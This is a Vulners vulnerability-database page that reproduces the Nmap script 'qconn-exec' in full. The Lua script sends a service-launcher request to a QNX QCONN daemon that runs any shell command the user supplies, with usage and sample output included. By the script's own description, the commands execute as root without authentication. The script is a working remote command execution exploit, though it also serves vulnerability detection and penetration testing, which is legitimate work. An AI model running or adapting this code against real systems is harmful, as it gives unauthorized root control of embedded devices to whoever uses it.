Vulners
Lucene search
| Reporter | Title | Published | Views | Family All 998 |
|---|---|---|---|---|
 | Exploit for Code Injection in Samba | 2 Dec 202509:55 | – | githubexploit |
| Exploit for Code Injection in Samba | 25 May 201713:20 | – | githubexploit |
| Exploit for Code Injection in Samba | 15 May 202106:52 | – | githubexploit |
| Exploit for Code Injection in Samba | 30 May 201715:08 | – | githubexploit |
| Exploit for Code Injection in Samba | 25 May 201713:20 | – | githubexploit |
| Exploit for CVE-2017-0143 | 16 May 201719:34 | – | githubexploit |
| Exploit for Code Injection in Samba | 9 May 202102:32 | – | githubexploit |
| Exploit for Code Injection in Samba | 5 Jun 201716:25 | – | githubexploit |
| Exploit for Code Injection in Samba | 26 May 201700:58 | – | githubexploit |
| Exploit for Code Injection in Samba | 1 Nov 202223:17 | – | githubexploit |
10
local comm = require("comm")
local vulns = require("vulns")
local stdnse = require("stdnse")
local string = require("string")
local shortport = require("shortport")
description = [[
Attempts to identify whether a listening QNX QCONN daemon allows
unauthenticated users to execute arbitrary operating system commands.
QNX is a commercial Unix-like real-time operating system, aimed primarily at
the embedded systems market. The QCONN daemon is a service provider that
provides support, such as profiling system information, to remote IDE
components. The QCONN daemon runs on port 8000 by default.
For more information about QNX QCONN, see:
* http://www.qnx.com/developers/docs/6.3.0SP3/neutrino/utilities/q/qconn.html
* http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos
* http://www.exploit-db.com/exploits/21520
* http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec
]]
---
-- @usage
-- nmap --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p <port> <target>
--
-- @output
-- PORT STATE SERVICE VERSION
-- 8000/tcp open qconn qconn remote IDE support
-- | qconn-exec:
-- | VULNERABLE:
-- | The QNX QCONN daemon allows remote command execution.
-- | State: VULNERABLE
-- | Risk factor: High
-- | Description:
-- | The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating
-- | system commands as the 'root' user.
-- |
-- | References:
-- | http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos
-- |_ http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec
--
-- @args qconn-exec.timeout
-- Set the timeout in seconds. The default value is 30.
--
-- @args qconn-exec.bytes
-- Set the number of bytes to retrieve. The default value is 1024.
--
-- @args qconn-exec.cmd
-- Set the operating system command to execute. The default value is "uname -a".
--
-- @changelog
-- 2012-10-07 - Created - created by Brendan Coles - itsecuritysolutions.org
-- 2013-07-28 - Revised - allow users to specify arbitrary commands
-- - now uses the vuln library for reporting
author = "Brendan Coles"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "exploit", "vuln"}
portrule = shortport.port_or_service ({8000}, "qconn", {"tcp"})
action = function( host, port )
local vuln_table = {
title = "The QNX QCONN daemon allows remote command execution.",
state = vulns.STATE.NOT_VULN,
risk_factor = "High",
description = [[
The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating
system commands as the 'root' user.
]],
references = {
'http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos',
'http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec'
}
}
-- Set socket timeout
local timeout = (stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. ".timeout")) or 30)
-- Set max bytes to retrieve
local bytes = (stdnse.get_script_args(SCRIPT_NAME .. '.bytes') or 1024)
-- Set command to execute
local cmd = (stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "uname -a")
-- Send command as service launcher request
local req = string.format("service launcher\nstart/flags run /bin/sh /bin/sh -c \"%s\"\n", cmd)
stdnse.debug1("Connecting to %s:%s", host.targetname or host.ip, port.number)
local status, data = comm.exchange(host, port, req, {timeout=timeout*1000,bytes=bytes})
if not status then
stdnse.debug1("Timeout exceeded for %s:%s (Timeout: %ss).", host.targetname or host.ip, port.number, timeout)
return
end
-- Parse response
stdnse.debug2("Received reply:\n%s", data)
if not string.match(data, "QCONN") then
stdnse.debug1("%s:%s is not a QNX QCONN daemon.", host.targetname or host.ip, port.number)
return
end
-- Check if the daemon attempted to execute the command
if string.match(data, 'OK [0-9]+\r?\n') then
vuln_table.state = vulns.STATE.VULN
local report = vulns.Report:new(SCRIPT_NAME, host, port)
return report:make_output(vuln_table)
else
stdnse.debug1("%s:%s QNX QCONN daemon is not vulnerable.", host.targetname or host.ip, port.number)
return
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Nov 2015 20:41Current
0.9Low risk
Vulners AI Score0.9
EPSS0.94176